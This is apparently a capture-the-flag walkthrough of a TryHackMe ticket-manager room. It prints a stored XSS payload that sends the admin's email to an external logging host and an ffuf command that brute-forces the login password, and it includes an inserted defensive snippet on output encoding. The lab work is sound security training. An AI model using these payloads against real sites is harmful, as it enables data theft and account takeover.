This is a write-up/walkthrough of the room That’s The Ticket from TryHackMe.

Nmap Scan

First of all, we will do an Nmap scan:

~ nmap -sC -sV -oN initial.nmap $IP

We get the following results: (screenshot: Nmap Scan)


If we visit the website, we see the following: (screenshot: Ticket Manager)

Click on register and create an account.

We then get taken to this dashboard: (screenshot: Dashboard)

We can try basic XSS in the ticket input:


This works and we get the following: (screenshot: XSS)

DNS and HTTP Logger

If we go back to TryHackMe, we see that it recommends the HTTP & DNS Logging tool.

We can now use the following XSS payload:

</textarea><img src="">
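The payload works because the stored ticket text is written into the page unencoded, so its closing tag ends the element early. The following is an added example, not code from the room or from this write-up, showing the weak rendering beside output encoding; the function names and the assumption that tickets are rendered inside a textarea element are hypothetical.

```javascript
// Added example, not the room's code. Assumption: the ticket page places the
// stored message inside a <textarea>, as the closing tag in the payload suggests.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the characters that can close the text context or open new markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Weak version: the stored message is concatenated into the page unchanged.
function renderTicketUnsafe(message) {
  return "<textarea readonly>" + message + "</textarea>";
}

// Hardened version: the message is encoded at output time, so it stays text.
function renderTicketSafe(message) {
  return "<textarea readonly>" + escapeHtml(message) + "</textarea>";
}

// Returns whatever markup follows the first </textarea>; an empty string means
// the message never escaped the element.
function markupAfterTextarea(html) {
  const close = "</textarea>";
  const at = html.toLowerCase().indexOf(close);
  return at === -1 ? "" : html.slice(at + close.length);
}

// Sample input: the payload exactly as it appears in this write-up.
const sample = '</textarea><img src="">';

// Render the sample both ways and report what ends up outside the element.
function demo() {
  return {
    unsafeLeak: markupAfterTextarea(renderTicketUnsafe(sample)),
    safeLeak: markupAfterTextarea(renderTicketSafe(sample)),
    safeHtml: renderTicketSafe(sample),
  };
}

console.log(demo());
```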

Getting the admin email

We can use the following XSS payload:

var email = document.getElementById("email").innerText;
email = email.replace("@", "aaa")
email = email.replace(".", "ooo")
document.location = "http://"+ email +""

And we will receive the following request:

(screenshot: Admin email)

Getting the admin password

We can get the admin password by brute-forcing with ffuf.

ffuf -w /usr/share/wordlists/rockyou.txt  -d "email=<ADMINEMAIL>&password=FUZZ" -u http://$IP/login -fw 475 -H "Content-Type: application/x-www-form-urlencoded"

This will get the admin password, which we can log in with. (screenshot: Admin Account)

Support Ticket

We can then read ticket 1 to get the flag!

(screenshot: Ticket 1)

And that is the room complete!